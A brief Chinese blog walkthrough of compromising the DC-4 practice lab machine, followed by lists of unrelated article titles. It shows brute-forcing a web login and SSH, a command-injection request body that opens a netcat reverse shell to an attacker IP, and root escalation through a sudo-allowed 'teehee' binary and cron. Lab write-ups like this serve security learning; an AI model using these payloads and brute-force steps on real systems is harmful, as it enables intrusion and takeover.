DC-4靶机渗透

扫描内网机器,看到143是开启的,那么ok了,确定了目标主机的地址。

对其进行进一步的端口扫描,80,22端口都是开放的。

访问具体网页,进行爆破,分别为admin,happy。

里面能够执行三种命令,看一下中间的包,发现命令直接进行了显示,那可以直接构造反弹shell了,当前身份是在www-data目录下

radio=nc+192.168.114.128+9090+-e+/bin/bash&submit=Run

反弹成功,利用python进入交互模式:

查找了三个用户,在jim用户目录下看到了password的密码本。

利用密码本进行ssh的爆破

进入之后看到一封信,可以知道用户跟密码了

登陆以后发现能以root身份执行 /usr/bin/teehee

可以利用teehee进行提权,执行定时计划,成功提权。

最新文章

  1. Oracle 的基本操作符
  2. 修改github.com域名解析
  3. webapi filter过滤器中获得请求的方法详情(方法名,Attributes)
  4. 问题:无法获得锁 /var/lib/dpkg/lock - open (11: 资源临时不可用)
  5. Asset Catalog Help (二)---Creating an Asset Catalog
  6. Hadoop第10周练习—Mahout部署及进行20newsgroup数据分析例子
  7. Java基础-常量池
  8. java正则表达式取括号里面的内容
  9. ZOJ-3929 Deque and Balls (DP+找规律)
  10. Verilog
  11. python学习之js从0开始
  12. Delphi 之弹出气泡消息提示
  13. 4412 uboot上手
  14. ubuntu 安装Pangolin 过程
  15. CentOS7安装OpenStack(Rocky版)-09.安装Cinder存储服务组件(控制节点)
  16. Django(4)
  17. EditorUtility类的说明
  18. AndroidStudio build.gradle 报错
  19. Windows网络编程系列教程之四:Select模型
  20. ubuntu - 14.04,解决Gnome桌面右键菜单失效问题!

热门文章

  1. 操作系统-I/O(6)I/O与系统调用
  2. web渗透测试之sqlmap拿到数据库信息
  3. 访问github太慢?我写了一个开源小工具一键变快
  4. 【译】Introducing “Web Live Preview”
  5. 【Go语言入门系列】(七)如何使用Go的方法?
  6. python爬取酷我音乐(收费也可)
  7. 【Android】Android开发初学者实现拨打电话的功能,拨打电话app小demo实现
  8. Single Shot MultiBox Detector论文翻译【修改】
  9. Web测试和前端技术
  10. Kubernetes v1.12/v1.13 二进制部署集群(HTTPS+RBAC)